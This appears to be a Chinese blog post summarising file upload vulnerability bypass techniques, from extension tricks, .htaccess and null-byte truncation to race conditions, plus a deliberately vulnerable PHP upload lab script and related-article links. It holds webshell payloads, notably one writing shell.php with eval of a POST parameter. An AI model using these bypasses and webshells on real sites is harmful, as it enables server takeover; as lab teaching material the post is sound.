文件上传漏洞Bypass总结

前端JS验证文件类型:

上传后缀jpg,抓包改为php后缀

=========================================================================

黑名单:

========================================================================

content-type绕过

​ 后端仅判断content-type类型,可以通过抓包修改content-type值进行绕过

使用别名、大小写绕过

​ 使用php3,phtml等别名绕过。或大小写 Php等名称进行绕过

.htaccess

​ 先上传.htaccess 文件,指定将文件解析为php文件运行,然后再上传图片马

后缀加空绕过

原文件名:filename=“info.php”

修改后文件名:filename=“info.php ”       //加了一个空格

后缀加 . 绕过

原文件名:filename=“info.php”

修改后文件名:filename=“info.php.”           //  此方法只适用于windows系统

文件流绕过

原文件名:filename=“info.php”

修改后文件名:filename=“info.php::$DATA”    //此方法只适用于windows系统

点空格点绕过

原文件名:filename=“info.php”

原文件名:filename=“info.php. .”

双写绕过

原文件名:filename=“info.php”

修改后文件名:filename=“info.pphphp”      //后端只过滤一次时有效(非循环过滤)

================================================

白名单:

=====================================================================

文件头判断绕过:

后端通过识别文件头进行判断文件类型,一般使用GIF89a文件头进行绕过

    原data:

             <?php phpinfo();?>

    修改后data:

      GIF89a

      <?php phpinfo();?>

00截断绕过:

前置条件:php版本小于5.3.4,且魔术引号关闭
实例一:URL中有保文件径

抓包发现URL有保存路径,可以通过修改保存路径控制文件的保存信息(需要修改type与file name)

修改保存路径后成功保存为PHP文件
实例二:body中有文件路径

        POST类型的00截断不能使用直接添加%00的原因是。GET方式的%00会被服务器解码成null,而于GET不同的是POST类型的需要先URL解码成null再发送数据包
操作成功

关于GET与POST不同的解释:

        当path存在于URL或COOKIE中或不存在’enctye=“multipart/form-data”'字段的表单中时,后端会对提交的数据进行一次URLdecode,变成字符串结束符号。可以直接使用%00

        当path存在于上传的body时,头部中有‘enctye=“multipart/form-data”'字段(不对数据表单数据进行编码),所以需要对%00进行decode后再上传

条件竞争(逻辑漏洞)BYPASS:

概念:
开发者进行开发时常认为代码会以线性方式运行,当多个线程并发时,会造成不可预料的后果
原理:
文件上传到服务器目录,再进行验证,若不符合条件则删除
思路:
先上传文件到服务器,再使用多线程并发访问该文件。若在上传完成到验证开始的阶段成功对文件进行访问,则可以占用当前文件资源,并导致无法删除。
实战:

payload:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_post["cmd"])?>');?>

   // 脚本运行后生成新的脚本


实验源码大意:

     将文件上传到服务器,服务器保存并开始验证,若成功通过验证则保存并重命名。若不通过则删除

设置线程后持续发送上传和访问的数据包



shell写入成功

Apache解析漏洞:

含有保存文件名与原文件名
这里利用Apache解析漏洞,修改save_name的值

​ 文件被成功上传并地址为

http://127.0.0.1/file/upload/taotao.php/

数组绕过:

实验源码:

$is_upload = false;

$msg = null;

if(!empty($_FILES['upload_file'])){

    //检查MIME

    $allow_type = array('image/jpeg','image/png','image/gif');

    if(!in_array($_FILES['upload_file']['type'],$allow_type)){

        $msg = "禁止上传该类型文件!";

    }else{

        //检查文件名

        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];

        if (!is_array($file)) {

            $file = explode('.', strtolower($file));

        }

        $ext = end($file);

        $allow_suffix = array('jpg','png','gif');

        if (!in_array($ext, $allow_suffix)) {

            $msg = "禁止上传该后缀文件!";

        }else{

            $file_name = reset($file) . '.' . $file[count($file) - 1];

            $temp_file = $_FILES['upload_file']['tmp_name'];

            $img_path = UPLOAD_PATH . '/' .$file_name;

            if (move_uploaded_file($temp_file, $img_path)) {

                $msg = "文件上传成功!";

                $is_upload = true;

            } else {

                $msg = "文件上传失败!";

            }

        }

    }

}else{

    $msg = "请选择要上传的文件!";

}


源码中检测MIME的部分很好绕过

而if (!is_array($file)) {

            $file = explode('.', strtolower($file));

        }

        这部分将保存文件名分为数组,并储存到file[]中,而后检测数组最后一个值是否符合规范。通过检测后进行重新拼接
BYpass:
绕过的关键在于 ‘if(!is_array($file))’,使用手动构造数组的方式进行绕过.

成功上传

文件上传漏洞Bypass总结的更多相关文章

  1. 【原创】JEECMS v6~v7任意文件上传漏洞(1)

    文章作者:rebeyond 受影响版本:v6~v7 漏洞说明: JEECMS是国内Java版开源网站内容管理系统(java cms.jsp cms)的简称.该系统基于java技术开发,继承其强大.稳定 ...

  2. web安全之文件上传漏洞

    成因: 当文件上传时,若服务端脚本语言未对上传的文件进行严格验证和过滤,若恶意用户上传恶意的 脚本文件时,就有可能控制整个网站甚至是服务器,这就是文件上传漏洞. 权限: 1. 后台权限:登陆了后台,可 ...

  3. Web应用安全之文件上传漏洞详解

    什么是文件上传漏洞 文件上传漏洞是在用户上传了一个可执行的脚本文件,本通过此脚本文件获得了执行服务器端命令的功能,这种攻击方式是最为直接,最为有效的,有时候,几乎没有什么门槛,也就是任何人都可以进行这 ...

  4. 文件上传漏洞演示脚本之js验证

    文件上传漏洞演示脚本之js验证 0 0       716   关于文件上传漏洞,想必玩web安全的同学们都有接触,之前本站也发布过一篇文章介绍文件上传漏洞的各种绕过方法,但是只是有文档却没有演示代码 ...

  5. 中国电信某站点JBOSS任意文件上传漏洞

    1.目标站点 http://125.69.112.239/login.jsp 2.简单测试 发现是jboss,HEAD请求头绕过失败,猜测弱口令失败,发现没有删除 http://125.69.112. ...

  6. CKFinder 1.4.3 任意文件上传漏洞

    CKFinder 是国外一款非常流行的所见即所得文字编辑器,其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件. CKFinder在上传文件的时候,强制将文件名(不 ...

  7. 小白日记38:kali渗透测试之Web渗透-手动漏洞挖掘(四)-文件上传漏洞

    手动漏洞挖掘 文件上传漏洞[经典漏洞,本身为一个功能,根源:对上传文件的过滤机制不严谨] <?php echo shell_exec($_GET['cmd']);?> 直接上传webshe ...

  8. PHP漏洞全解(九)-文件上传漏洞

    本文主要介绍针对PHP网站文件上传漏洞.由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过 Web 访问的目录上传任意PHP文件,并能够将这些文件传递给 P ...

  9. WordPress Contact Form 7插件任意文件上传漏洞

    漏洞名称: WordPress Contact Form 7插件任意文件上传漏洞 CNNVD编号: CNNVD-201311-415 发布时间: 2013-11-28 更新时间: 2013-11-28 ...

随机推荐

  1. regexp 正则表达式

    * 给定字符串 str,检查其是否包含连续重复的字母(a-zA-Z),包含返回 true,否则返回 false input: 'rattler' output: true function conta ...

  2. CVE-2012-0158 漏洞分析报告

      Office 2003 sp3(CVE-2012-0158)漏洞分析报告   软件名称:Office 2003 sp3 软件版本:2.0 漏洞模块:MSCOMCTL.ocx 模块版本:2.0.0. ...

  3. turtle color设置的几种方式

    t.colormode() 查看色彩模式,缺省1.0,即RGB范围在0-1 模式切换:参数填1.0或255 t.colormode(1.0) t.colormode(255) 设置颜色,以设置penc ...

  4. 鸿蒙内核源码分析(互斥锁篇) | 比自旋锁丰满的互斥锁 | 百篇博客分析OpenHarmony源码 | v27.02

    百篇博客系列篇.本篇为: v27.xx 鸿蒙内核源码分析(互斥锁篇) | 比自旋锁丰满的互斥锁 | 51.c.h .o 进程通讯相关篇为: v26.xx 鸿蒙内核源码分析(自旋锁篇) | 自旋锁当立贞 ...

  5. P6091-[模板]原根

    正题 题目链接:https://www.luogu.com.cn/problem/P6091 题目大意 给出一个数\(p\),求出它的所有在\([0,p]\)的原根. 解题思路 原根的定义,\(\de ...

  6. Python代码阅读(第8篇):列表元素逻辑判断

    Python 代码阅读合集介绍:为什么不推荐Python初学者直接看项目源码 本篇阅读的三份代码的功能分别是判断列表中的元素是否都符合给定的条件:判断列表中是否存在符合给定的条件的元素:以及判断列表中 ...

  7. Spring,IOC源码分析

    有错勿喷 1.首先是Spring,IOC的基本概念 IOC是一个容器 容器启动的时候创建所有单实例对象 我们可以直接从容器中获取到这个对象 2.调试流程 ioc容器的启动过程?启动期间都做了什么(什么 ...

  8. 《手把手教你》系列技巧篇(二十八)-java+ selenium自动化测试-处理模态对话框弹窗(详解教程)

    1.简介 在前边的文章中窗口句柄切换宏哥介绍了switchTo方法,这篇继续介绍switchTo中关于处理alert弹窗的问题.很多时候,我们进入一个网站,就会弹窗一个alert框,有些我们直接关闭, ...

  9. kubelet源码分析——启动Pod

    前文说到Kubelet启动时,调用到kubelet.Run方法,里面最核心的就是调用到kubelet.syncLoop.它是一个循环,这个循环里面有若干个检查和同步操作,其中一个是地在监听Pod的增删 ...

  10. Java - 你的 Java 代码有这些坏味道吗?

    列举一些 Java 开发中常见的"不良实践",来源于代码扫描(https://github.com/pmd/pmd),和诸君一起学习参考: 1 - 关闭资源 CloseResour ...